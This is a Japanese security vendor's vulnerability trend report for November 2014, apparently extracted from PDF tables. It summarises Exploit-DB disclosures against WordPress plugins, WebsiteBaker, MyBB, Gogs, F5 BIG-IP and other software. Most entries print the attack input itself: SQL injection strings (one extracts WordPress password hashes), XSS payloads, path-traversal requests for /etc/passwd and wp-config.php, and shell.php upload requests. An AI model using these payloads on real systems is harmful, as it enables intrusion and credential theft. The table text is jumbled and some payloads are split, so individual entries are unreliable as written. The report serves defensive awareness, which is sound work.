2014.11 EDB-Report 最新Web脆弱性トレンドレポート(2014.11) 2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 2014年11月は、Exploit-DBより公開されている脆弱性の中、SQLインジェクション(SQL Injection)の攻撃が最も多かった月です。分析されたSQLインジェクションの攻撃パターンは、攻撃 実行の難易度は難のレベルであり、危険度も高以上のレベルの脆弱性が多く見られました。管理者は、アップデートおよび定期的セキュリティパッチを実施するとともにSQLインジェクション攻撃に さらされないように注意をしなければなりません。主なソフトウェアの脆弱性の傾向では、オープンソースCMSであるWordpressとWebsiteBakerにて最も多く見られているため、定期的セキュリ ティパッチを実施することで当該の脆弱性に対し対応を行うことを推奨します。 1. 脆弱性別件数 19 脆弱性カテゴリ 16脆弱性別件数 件数 SQLインジェクション (SQL Injection) クロス サイト スクリプティング (Cross Site Scripting:XSS) ローカルファイル挿入 20 15 19 10 7 16 2 7 (Local File Inclusion:LFI) 5 0 ファイルアップロード 2 (File Upload) 合計 44 危険度別分類 2. 危険度別件数 危険度 件数 割合 早急対応要 13 30% 高 中 合計 31 0 44 70% 0% 100% 0 13 早急対応要 高 中 31 3. 攻撃実行の難易度別件数 難易度 件数 割合 攻撃実行の難易度別件数 難 中 易 合計 6 5 33 44 14% 11% 75% 100% 6 難 5 中 易 33 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 件数 Wordpress WebsiteBaker MyBB Gogs Modx Symantec Endpoint Protection Serenity PHP-Fusion vldPersonals ManageEngine OpManager Joomla Progress OpenEdge Subex phpSound Music Sharing Platform F5 BIG-IP Piwigo Zoph RobotStats phpMyRecipes 合計 9 7 4 3 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 主なソフトウェア別脆弱性発生件数 10 Wordpress 9 9 WebsiteBaker 8 7 MyBB 7 6 Gogs 5 Modx 4 4 3 Symantec Endpoint Protection 3 Serenity 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1 PHP-Fusion vldPersonals 0 44 Copyright 2014 Penta Security Systems Inc. All rights reserved ManageEngine OpManager Joomla EDB-Report 最新Web脆弱性トレンドレポート(2014.11) 2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 危険度分類基準 早急対応要:攻撃が成功した場合システムへ侵入可 高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす 中:情報漏洩 攻撃実行難易度分類基準 難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得 するため、高度な攻撃コードを採用したパターン、知らされていない攻撃 コードを採用したパターンのいずれかに該当する 中:攻撃手法自体は難しくないが、迂回コードを採用したパターン 易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 35204 SQL Injection 中 早急対応要 Another Wordpress Classifieds Plugin - / SQL Injection 脆弱性 Wordpress 35212 LFI 易 早急対応要 Wordpress 35303 LFI 易 高 35313 SQL Injection 易 高 35341 File Upload 易 高 35340 SQL Injection 易 高 35371 SQL Injection 難 早急対応要 35346 LFI 易 高 XCloner Wordpress/Joomla! Plugin - admin-ajax.php LFI 脆弱性 Paid Memberships Pro 1.7.14.2 - admin-ajax.php SQL Injection 脆 弱性 Wordpress SP Client Document Manager Plugin 2.4.1 - /sp-clientdocument-manager/ajax.php SQL Injection 脆弱性 Wordpress wpDataTables Plugin 1.5.3 - admin-ajax.php File Upload 脆弱性 Wordpress wpDataTables Plugin 1.5.3 - admin-ajax.php SQL Injection 脆弱性 Wordpress Google Document Embedder 2.5.14 - view.php SQL Injection 脆弱性 DukaPress 2.5.2 - dp_image.php LFI 脆弱性 35378 LFI 易 早急対応要 Wordpress DB Backup Plugin - download.php LFI 脆弱性 Wordpress 35277 SQL Injection 易 高 WebsiteBaker 2.8.3 - modify.php SQL Injection 脆弱性 WebsiteBaker 35277 XSS 易 高 WebsiteBaker 2.8.3 - tool.php XSS 脆弱性 WebsiteBaker 35277 XSS 易 高 WebsiteBaker 2.8.3 - edit_module_files.php XSS 脆弱性 WebsiteBaker 35277 XSS 易 高 WebsiteBaker 2.8.3 - add_post.php XSS 脆弱性 WebsiteBaker 35277 XSS 易 高 WebsiteBaker 2.8.3 - modify_group.php XSS 脆弱性 WebsiteBaker 35277 XSS 易 高 WebsiteBaker 2.8.3 - modify_post.php XSS 脆弱性 WebsiteBaker 35277 XSS 易 高 WebsiteBaker 2.8.3 - modify_settings.php XSS 脆弱性 WebsiteBaker Copyright 2014 Penta Security Systems Inc. All rights reserved ソフトウェア名 Wordpress Wordpress Wordpress Wordpress Wordpress Wordpress EDB-Report 最新Web脆弱性トレンドレポート(2014.11) 2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2014/11/1 EDB番号 35127 脆弱性カテゴリ LFI 攻撃難易度 易 危険度 対象プログラム 対象環境 Progress OpenEdge Progress OpenEdge 11.2 Subex Subex FMS 7.4 高 Modx CMS 2.2.14 /day/modx/manager/index.php?a=55&class_key /day/modx/manager/index =modStaticResource&context_key="></script> .php XSS 脆弱性(1) <img src=x onerror=prompt(/XSS/)> Modx Modx CMS 2.2.14 高 Modx CMS 2.2.14 /day/modx/manager/index.php?id=1&context=< /day/modx/manager/index script>alert(1)</script> .php XSS 脆弱性(2) Modx Modx CMS 2.2.14 高 Symantec Endpoint /console/Highlander_docs/SSOProtection 12.1.4023.4080 Error.jsp?ErrorMsg=<script>alert('xss')</script> - SSO-Error.jsp XSS 脆弱性 Symantec Endpoint Protection 高 Symantec Endpoint Protection 12.1.4023.4080 servlet/ConsoleServlet?ActionType=/../../../../../. - /servlet/ConsoleServlet ./../../../../WINDOWS/win.ini%00 LFI 脆弱性 Symantec Endpoint Protection 12.1.4023.408 0 Symantec Symantec Endpoint Protection 高 脆弱性名 攻撃コード Progress OpenEdge 11.2 - /report/reportViewAction.jsp?selection=../../../../ reportViewAction.jsp LFI ../../../.. 脆弱性 /../../windows/win.ini POST /login/login HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-formurlencoded; charset=UTF-8 2014/11/1 2014/11/5 2014/11/5 2014/11/6 2014/11/6 2014/11/10 35214 35159 35159 35181 35181 35197 SQL Injection XSS XSS XSS LFI File Upload 難 易 易 易 易 易 Subex FMS 7.4 - /login 早急対応要 SQL Injection 脆弱性 高 ranger_user[name]=admin' AND 3402=(CASE WHEN (ASCII(SUBSTRC((SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65)) =CHR(68)||CHR(66)||CHR(65)) THEN 1 ELSE 0 END) FROM DUAL),1,1)) > 47) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR (102)||CHR(100)||CHR(114),5) ELSE 3402 END) AND 'a'='a&ranger_user[password]=secuid0&commit =Login&ranger_user_i2[features]=0 POST /demo/serenity-cc/ HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Serenity Client Content-Type: multipart/form-data; boundary=Management Portal 1.0.1 - --------------------------7dd10029908f2 /serenity-cc/ File Upload 脆弱性 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="edit"; filename="shell.php" Content-Type: application/octet-stream <?php echo ?> -----------------------------7dd10029908f2-- Copyright 2014 Penta Security Systems Inc. All rights reserved Serenity Endpoint Protection 12.1.4023.408 0 Serenity Client Management Portal 1.0.1 EDB-Report 最新Web脆弱性トレンドレポート(2014.11) 2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 Serenity Serenity Client Management Portal 1.0.1 POST /serenity-cc/ HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-formurlencoded; charset=UTF-8 2014/11/10 2014/11/10 2014/11/10 35197 35206 35206 XSS SQL Injection SQL Injection 易 易 易 高 Serenity Client Management Portal 1.0.1 - edit=user&object=1&userfname=%22%3E%3Cs /serenity-cc/ XSS 脆弱性 cript%3Ealert(document.cookie)%3B%3C%2Fscr ipt%3E&userlname=%22%3E%3Cscript%3Ealert (document.cookie)%3B%3C%2Fscript%3E&user email=&userpassword=&userhome=&usercell=& userwork=&userfax=&useraddone=&useraddtwo =&usercity=&userstate=&userzip=&country=Uni ted+States&userwebsite=&userskype=&useryah oo=&userfb=&usertwitter=&usergoogle=&userli nkedin= 高 PHP-Fusion 7.02.07 submissions.php SQL Injection 脆弱性 /PHPFusion/files/administration/submissions.php?acti on=2&aid=9b23a9871adc75 cd&submit_id=1%20and%201=1--&t=n PHP-Fusion PHP-Fusion 7.02.07 高 PHP-Fusion 7.02.07 members.php SQL Injection 脆弱性 /PHPFusion/files/administration/members.php?aid=9b 23a9871adc75cd&status=4%20and%201=1-- PHP-Fusion PHP-Fusion 7.02.07 Wordpress Another Wordpress Classifieds Plugin vldPersonals vldPersonals 2.7 vldPersonals vldPersonals 2.7 Wordpress Wordpress XCloner Plugin POST /?page_id=16592 HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-formurlencoded; charset=UTF-8 2014/11/10 35204 SQL Injection 중 2014/11/10 35193 XSS 易 2014/11/10 35193 SQL Injection 中 Another Wordpress 早急対応要 Classifieds Plugin - / SQL Injection 脆弱性 高 vldPersonals 2.7 index.php XSS 脆弱性 a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&s earchpricemin=1&searchpricemax=2&selectcountry0.2917955784677633=&textfieldcountry0.2917955784677633=country® ions[0][country]=country&selectstate0.3360776012424508=&textfieldstate0.3360776012424508=state® ions[0][state]=State&selectcity0.8672109586380441=&textfieldcity0.8672109586380441=city® ions[0][city]=city /index.php?m=member_profile&p=profile&id=98 11c”><script>alert(1)<%2fscript>b7ec317c816 POST /index.php?m=search HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 vldPersonals 2.7 Accept: */* 早急対応要 index.php SQL Injection 脆 Content-Type: application/x-www-form弱性 urlencoded; charset=UTF-8 age_from=19&age_to=19&issearch=1&submit= Search&gender1=2&gender2=2&type_id=memb ers&country=1%20and%20benchmark(2000000 0%2csha1(1))–%20 2014/11/10 35212 LFI 易 XCloner Wordpress/Joomla! Plugin 早急対応要 - admin-ajax.php LFI 脆弱 性 /wp-admin/adminajax.php?action=json_return&page=xcloner_sho w&option=com_cloner&task=download&file=../.. /../../etc/passwd Copyright 2014 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2014.11) 2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 2014/11/10 35209 SQL Injection 易 高 2014/11/10 2014/11/10 35209 35198 SQL Injection XSS 易 易 高 高 脆弱性名 攻撃コード 対象プログラム 対象環境 POST /servlet/APMBVHandler?OPERATION_TYPE=Dele te&OPM_BVNAME=1%20and%201=1-HTTP/1.1 Host: ManageEngine OpManager ManageEngine ManageEngine User-Agent: Mozilla/5.0 Windows NT 6.1; - /APMBVHandler SQL OpManager OpManager WOW64 AppleWebKit/535.7 KHTML, like Gecko Injection 脆弱性 Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-formurlencoded; charset=UTF-8 POST /servlet/DataComparisonServlet?operation=com pare&numPrimaryKey=1337&query=1%20and% 202=2-- HTTP/1.1 Host: ManageEngine OpManager User-Agent: Mozilla/5.0 Windows NT 6.1; ManageEngine ManageEngine - /DataComparisonServlet WOW64 AppleWebKit/535.7 KHTML, like Gecko OpManager OpManager SQL Injection 脆弱性 Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-formurlencoded; charset=UTF-8 phpSound Music Sharing Platform 1.0.5 - phpSound phpSound /index.php?a=explore&filter=</title><script>ale Music Sharing Music Sharing rt(document.cookie);</script> Platform Platform 1.0.5 POST /mybb-1.8.1/member.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-formurlencoded; charset=UTF-8 2014/11/13 2014/11/13 2014/11/13 2014/11/13 35224 35224 35224 35220 SQL Injection XSS XSS SQL Injection 難 易 易 難 regcheck1=® MyBB 1.8.X - member.php 早急対応要 check2=true&username=woot&password=rando SQL Injection 脆弱性 m&password2=random&email=woot%40woot.co m&email2=woot%40woot.com&referrername=& imagestring=6cj5n&imagehash=b2dee8e4028e9 cad37e30c31753dfe01&answer=4&question_id= C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORD ER+BY+9#&allownotices=1&receivepms=1&pm notice=1&subscriptionmethod=0&timezoneoffset =0&dstcorrection=2® time=1415880544&step=registration&action=do _register MyBB MyBB 1.8.X 高 /mybbMyBB 1.8.X - member.php 1.8.1/report.php?type=XSS%22%3E%3Cscript% XSS 脆弱性 3Ealert%28666%29%3C%2fscript%3E&pid=1 MyBB MyBB 1.8.X 高 MyBB 1.8.X - index.php XSS 脆弱性 /mybb-1.8.1/admin/index.php?module=styletemplates&action=edit_template&title=calendar" ><script>alert(666)</script>&sid=1&expand=1 MyBB MyBB 1.8.X Joomla Joomla HD FLV Player < 2.1.0.1 Joomla HD FLV Player < 早急対応要 2.1.0.1 - index.php SQL Injection 脆弱性 /index.php?option=com_hdflvplayer&id=9404%20UNION%20ALL%20SELECT%20CONCA T%280x68306d336c34623174%2CIFNULL%28C AST%28CURRENT_USER%28%29%20AS%20CH AR%29%2C0x20%29%2C0x743162346c336d30 68%29 Copyright 2014 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2014.11) 2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2014/11/13 EDB番号 35222 脆弱性カテゴリ LFI 攻撃難易度 易 危険度 高 脆弱性名 攻撃コード POST /tmui/Control/form HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Referer: https://<ip>/tmui/Control/jspmap/tmui/system/ archive/properties.jsp?name=../../../../../etc/pas swd Cookie : JSESSIONID=6C6BADBEFB32C36CDE7A59C416 659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB6 0417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.js p?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/syst em/archive/properties.jsp%3Fname%3D../../../.. /../etc/passwd F5 BIG-IP 10.1.0 Content-Type: application/x-www-form/tmui/Control/form LFI 脆 urlencoded; charset=UTF-8 弱性 対象プログラム 対象環境 F5 BIG-IP F5 BIG-IP 10.1.0 Piwigo Piwigo 2.6.0 _form_holder_opener_=&handler=%2Ftmui%2F system%2Farchive%2Fproperties&handler_befor e=%2Ftmui%2Fsystem%2Farchive%2Fpropertie s&showObjList=&showObjList_before=&hideObjL ist=&hideObjList_before=&enableObjList=&enabl eObjList_before=&disableObjList=&disableObjLis t_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2 b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b &_bufvalue_validation=NO_VALIDATION&com.f5 .util.LinkedAdd.action_override=%2Ftmui%2Fsys tem%2Farchive%2Fproperties&com.f5.util.Linke dAdd.action_override_before=%2Ftmui%2Fsyste m%2Farchive%2Fproperties&linked_add_id=&lin ked_add_id_before=&name=..%2F..%2F..%2F.. %2F..%2Fetc%2Fpasswd&name_before=..%2F.. %2F..%2F..%2F..%2Fetc%2Fpasswd&form_pag e=%2Ftmui%2Fsystem%2Farchive%2Fpropertie s.jsp%3F&form_page_before=%2Ftmui%2Fsyst em%2Farchive%2Fproperties.jsp%3F&download _before=Download%3A+..%2F..%2F..%2F..%2F ..%2Fetc%2Fpasswd&restore_before=Restore&d elete=Delete&delete_before=Delete 2014/11/13 35221 SQL Injection 易 高 POST /piwigo/picture.php?/1/category/1&action=rate HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; Piwigo 2.6.0 - picture.php WOW64 AppleWebKit/535.7 KHTML, like Gecko SQL Injection 脆弱性 Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-formurlencoded; charset=UTF-8 rate=1 and 2=2-- Copyright 2014 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2014.11) 2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2014/11/14 2014/11/14 2014/11/14 2014/11/17 2014/11/17 2014/11/17 2014/11/17 EDB番号 35238 35238 35237 35278 35277 35277 35277 脆弱性カテゴリ SQL Injection SQL Injection SQL Injection XSS SQL Injection XSS XSS 攻撃難易度 攻撃コード 対象プログラム 対象環境 難 Gogs (users and repos q pararm) 早急対応要 /api/v1/repos/search SQL Injection 脆弱性 /api/v1/repos/search?q=%27)%09UNION%09SE LECT%09*%09FROM%09(SELECT%09null)%09 AS%09a1%09%09JOIN%09(SELECT%091)%09 as%09u%09JOIN%09(SELECT%09user())%09A S%09b1%09JOIN%09(SELECT%09user())%09A S%09b2%09JOIN%09(SELECT%09null)%09as% 09a3%09%09JOIN%09(SELECT%09null)%09as %09a4%09%09JOIN%09(SELECT%09null)%09a s%09a5%09%09JOIN%09(SELECT%09null)%09 as%09a6%09%09JOIN%09(SELECT%09null)%0 9as%09a7%09%09JOIN%09(SELECT%09null)% 09as%09a8%09%09JOIN%09(SELECT%09null) %09as%09a9%09JOIN%09(SELECT%09null)%0 9as%09a10%09JOIN%09(SELECT%09null)%09a s%09a11%09JOIN%09(SELECT%09null)%09as %09a12%09JOIN%09(SELECT%09null)%09as% 09a13%09%09JOIN%09(SELECT%09null)%09a s%09a14%09%09JOIN%09(SELECT%09null)%0 9as%09a15%09%09JOIN%09(SELECT%09null) %09as%09a16%09%09JOIN%09(SELECT%09n ull)%09as%09a17%09%09JOIN%09(SELECT%0 9null)%09as%09a18%09%09JOIN%09(SELECT %09null)%09as%09a19%09%09JOIN%09(SELE CT%09null)%09as%09a20%09%09JOIN%09(SE Gogs Gogs 難 Gogs (users and repos q pararm) 早急対応要 /api/v1/users/search SQL Injection 脆弱性 /api/v1/users/search?q='/**/and/**/false)/**/u nion/**/select/**/null,null,@@version,null,null,n ull,null,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/fr om/**/mysql.db/**/where/**/('%25'%3D' Gogs Gogs 中 Gogs (label pararm) 早急対応要 /user/repos/issues SQL Injection 脆弱性 /user/repos/issues?label=' or char_length(@@version) > 10 and '|%'='&type=all&state= Gogs Gogs 高 Zoph 0.9.1 edit_photos.php XSS 脆弱 性 /zoph/php/edit_photos.php?photographer_id=3" ><script>alert(1)</script> Zoph Zoph 0.9.1 高 WebsiteBaker 2.8.3 modify.php SQL Injection 脆弱性 /wb/admin/pages/modify.php?page_id=1%20an d%201=1-- WebsiteBaker WebsiteBaker 2.8.3 高 WebsiteBaker 2.8.3 tool.php XSS 脆弱性 /wb/admin/admintools/tool.php?tool=captcha_co ntrol&6d442"><script>alert(1)</script>8e3b12 WebsiteBaker 642a8=1 WebsiteBaker 2.8.3 高 /wb/modules/edit_module_files.php?page_id=1& WebsiteBaker 2.8.3 mod_dir=news&edit_file=frontend.css&action=e edit_module_files.php XSS WebsiteBaker dit&page_id=1§ion_id=%007e393<script>al 脆弱性 ert(1)</script>9f8a40a7355f9acf0 WebsiteBaker 2.8.3 /wb/modules/news/add_post.php?page_id=1&se ction_id=f953a"><script>alert(1)</script>4ddf3 WebsiteBaker 369c1f WebsiteBaker 2.8.3 /wb/modules/news/modify_group.php?page_id= 1§ion_id=%008cf03"><script>alert(1)</scri WebsiteBaker pt>2680504c3ec&group_id=62be99873b33d1d3 WebsiteBaker 2.8.3 易 易 易 易 危険度 脆弱性名 2014/11/17 35277 XSS 易 高 WebsiteBaker 2.8.3 add_post.php XSS 脆弱性 2014/11/17 35277 XSS 易 高 WebsiteBaker 2.8.3 modify_group.php XSS 脆 弱性 2014/11/17 35277 XSS 易 高 WebsiteBaker 2.8.3 /wb/modules/news/modify_post.php?page_id=1 modify_post.php XSS 脆弱 §ion_id=%003874a<script>alert(1)</script 性 >4194d511605&post_id=db89943875a2db52 高 WebsiteBaker 2.8.3 modify_settings.php XSS 脆弱性 2014/11/17 35277 XSS 易 WebsiteBaker WebsiteBaker 2.8.3 /wb/modules/news/modify_settings.php?page_id =1§ion_id=%008b2f4"><script>alert(1)</s WebsiteBaker cript>bdc8b3919b5 WebsiteBaker 2.8.3 Copyright 2014 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2014.11) 2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 MyBB MyBB Forums 1.8.2 Wordpress Wordpress Paid Memberships Pro 1.7.14.2 Wordpress Wordpress SP Client Document Manager Plugin 2.4.1 Wordpress Wordpress wpDataTables Plugin 1.5.3 POST /fuck/Upload/usercp.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-formurlencoded; charset=UTF-8 2014/11/17 2014/11/19 2014/11/21 35266 35303 35313 XSS LFI SQL Injection 易 易 易 高 MyBB Forums 1.8.2 usercp.php XSS 脆弱性 高 Paid Memberships Pro /wp-admin/admin1.7.14.2 - admin-ajax.php ajax.php?action=getfile&/../../wp-config.php SQL Injection 脆弱性 高 my_post_key=6fa6202df4adac5d50bd19b0c120 4992&bday1=&bday2=&bday3=&birthdayprivacy =all&website=http%3A%2F%2F&profile_fields% 5Bfid1%5D=&profile_fields%5Bfid2%5D=&profil e_fields%5Bfid3%5D=Undisclosed&usertitle=%3 Cimg+src%3Dx+onerror%3Dalert%28%27XSS %27%29%3B%3E&icq=&aim=&yahoo=&skype= &google=&away=0&awayreason=&awayday=&a waymonth=&awayyear=&action=do_profile® submit=Update+Profile POST /wordpress/wp-content/plugins/sp-clientdocument-manager/ajax.php?function=emailvendor HTTP/1.1 Wordpress SP Client Host: Document Manager Plugin User-Agent: Mozilla/5.0 Windows NT 6.1; 2.4.1 - /sp-clientWOW64 AppleWebKit/535.7 KHTML, like Gecko documentChrome/16.0.912.75 Safari/535.7 manager/ajax.php SQL Accept: */* Injection 脆弱性 Content-Type: application/x-www-formurlencoded; charset=UTF-8 vendor_email[]=1 and 2=2-- 2014/11/24 35341 File Upload 易 高 Wordpress wpDataTables Plugin 1.5.3 - adminajax.php File Upload 脆弱性 POST /wp-admin/adminajax.php?action=wdt_upload_file HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="Filedata"; filename="shell.php" Content-Type: application/octet-stream <?php echo ?> -----------------------------7dd10029908f2-- 2014/11/24 2014/11/24 2014/11/25 35340 35344 35371 SQL Injection SQL Injection SQL Injection 易 中 難 Wordpress wpDataTables Plugin 1.5.3 - adminajax.php SQL Injection 脆 弱性 /wp-admin/adminajax.php?action=get_wdtable&table_id=1%20an d%202=2-- Wordpress Wordpress wpDataTables Plugin 1.5.3 RobotStats 1.0 早急対応要 robots.php SQL Injection 脆弱性 /robotstats/admin/robots.php?rub=modif&robot =0x90+union+select+1,2,3,4,5,database(),7,8,9 ,10 RobotStats RobotStats 1.0 Wordpress Google Document Embedder 早急対応要 2.5.14 - view.php SQL Injection 脆弱性 /wp-content/plugins/google-documentembedder/view.php?embedded=1&gpid=0 UNION SELECT 1, 2, 3, CONCAT(CAST(CHAR(97, 58, 49, 58, 123, 115, 58, 54, 58, 34, 118, 119, 95, 99, 115, 115, 34, 59, 115, 58) as CHAR), LENGTH(user_pass), CAST(CHAR(58, 34) as CHAR), user_pass, CAST(CHAR(34, 59, 125) as CHAR)) FROM `wp_users` WHERE ID=1 Wordpress Wordpress Google Document Embedder 2.5.14 高 Copyright 2014 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2014.11) 2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2014/11/25 EDB番号 35365 脆弱性カテゴリ SQL Injection 攻撃難易度 中 危険度 脆弱性名 phpMyRecipes 1.2.2 早急対応要 dosearch.php SQL Injection 脆弱性 攻撃コード POST /phpMyReD44:I44cipes/dosearch.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-formurlencoded; charset=UTF-8 対象プログラム 対象環境 phpMyRecipes phpMyRecipes 1.2.2 Wordpress Wordpress DukaPress 2.5.2 Plugin Wordpress Wordpress DB Backup Plugin words_all=&words_exact=1 union select null&words_any=&words_without=&name_exact =&ing_modifier=2 2014/11/25 2014/11/26 35346 35378 LFI LFI 易 易 高 DukaPress 2.5.2 dp_image.php LFI 脆弱性 /wpcontent/plugins/dukapress/lib/dp_image.php?src =../../../../wp-config.php Wordpress DB Backup /wp-content/plugins/db早急対応要 Plugin - download.php LFI backup/download.php?file=/etc/passwd 脆弱性 Copyright 2014 Penta Security Systems Inc. All rights reserved
© Copyright 2024